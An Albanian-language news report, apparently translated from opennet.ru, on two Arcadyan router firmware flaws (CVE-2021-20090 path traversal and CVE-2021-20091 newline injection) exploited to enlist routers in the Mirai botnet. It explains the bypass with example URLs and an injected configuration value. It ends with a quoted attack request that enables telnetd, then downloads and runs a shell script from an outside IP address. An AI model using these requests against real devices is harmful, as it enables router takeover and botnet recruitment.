Një sulm masiv është regjistruar në rrjet kundër ruterave të shtëpisë, firmware i të cilëve përdor një implementim të serverit HTTP nga kompania Arcadyan. Për të fituar kontrollin mbi pajisjet, përdoret një kombinim i dy dobësive që lejon ekzekutimin në distancë të kodit arbitrar me të drejta rrënjësore. Problemi prek një gamë mjaft të gjerë ruterash ADSL nga Arcadyan, ASUS dhe Buffalo, si dhe pajisjet e furnizuara nën markat Beeline (problemi është konfirmuar në Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone dhe operatorët e tjerë të telekomit. Vihet re se problemi ka qenë i pranishëm në firmware Arcadyan për më shumë se 10 vjet dhe gjatë kësaj kohe ka arritur të migrojë në të paktën 20 modele pajisjesh nga 17 prodhues të ndryshëm.
Dobësia e parë, CVE-2021-20090, bën të mundur aksesin në çdo skript të ndërfaqes në internet pa vërtetim. Thelbi i cenueshmërisë është se në ndërfaqen në internet, disa drejtori përmes të cilave dërgohen imazhe, skedarë CSS dhe skriptet JavaScript janë të aksesueshme pa vërtetim. Në këtë rast, drejtoritë për të cilat lejohet qasja pa vërtetim kontrollohen duke përdorur maskën fillestare. Përcaktimi i karaktereve "../" në shtigjet për të shkuar te drejtoria prind bllokohet nga firmware, por përdorimi i kombinimit "..%2f" është anashkaluar. Kështu, është e mundur të hapen faqe të mbrojtura kur dërgohen kërkesa si "http://192.168.1.1/images/..%2findex.htm".
Dobësia e dytë, CVE-2021-20091, lejon një përdorues të vërtetuar të bëjë ndryshime në cilësimet e sistemit të pajisjes duke dërguar parametra të formatuar posaçërisht në skriptin apply_abstract.cgi, i cili nuk kontrollon praninë e një karakteri të linjës së re në parametra . Për shembull, kur kryen një operacion ping, një sulmues mund të specifikojë vlerën "192.168.1.2%0AARC_SYS_TelnetdEnable=1" në fushën me adresën IP që po kontrollohet dhe skriptin, kur krijon skedarin e cilësimeve /tmp/etc/config/ .glbcfg, do të shkruajë rreshtin “AARC_SYS_TelnetdEnable=1” në të ", i cili aktivizon serverin telnetd, i cili siguron akses të pakufizuar të guaskës së komandës me të drejta rrënjësore. Në mënyrë të ngjashme, duke vendosur parametrin AARC_SYS, mund të ekzekutoni çdo kod në sistem. Dobësia e parë bën të mundur ekzekutimin e një skripti problematik pa vërtetim duke e aksesuar atë si “/images/..%2fapply_abstract.cgi”.
Për të shfrytëzuar dobësitë, një sulmues duhet të jetë në gjendje të dërgojë një kërkesë në portin e rrjetit në të cilin funksionon ndërfaqja e internetit. Duke gjykuar nga dinamika e përhapjes së sulmit, shumë operatorë lënë akses në pajisjet e tyre nga rrjeti i jashtëm për të thjeshtuar diagnostikimin e problemeve nga shërbimi mbështetës. Nëse qasja në ndërfaqe është e kufizuar vetëm në rrjetin e brendshëm, një sulm mund të kryhet nga një rrjet i jashtëm duke përdorur teknikën "DNS rebinding". Dobësitë janë duke u përdorur tashmë në mënyrë aktive për të lidhur ruterat me botnetin Mirai: POST /images/..%2fapply_abstract.cgi Lidhja HTTP/1.1: mbyll Përdoruesin-Agjent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3_5&AR. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
Burimi: opennet.ru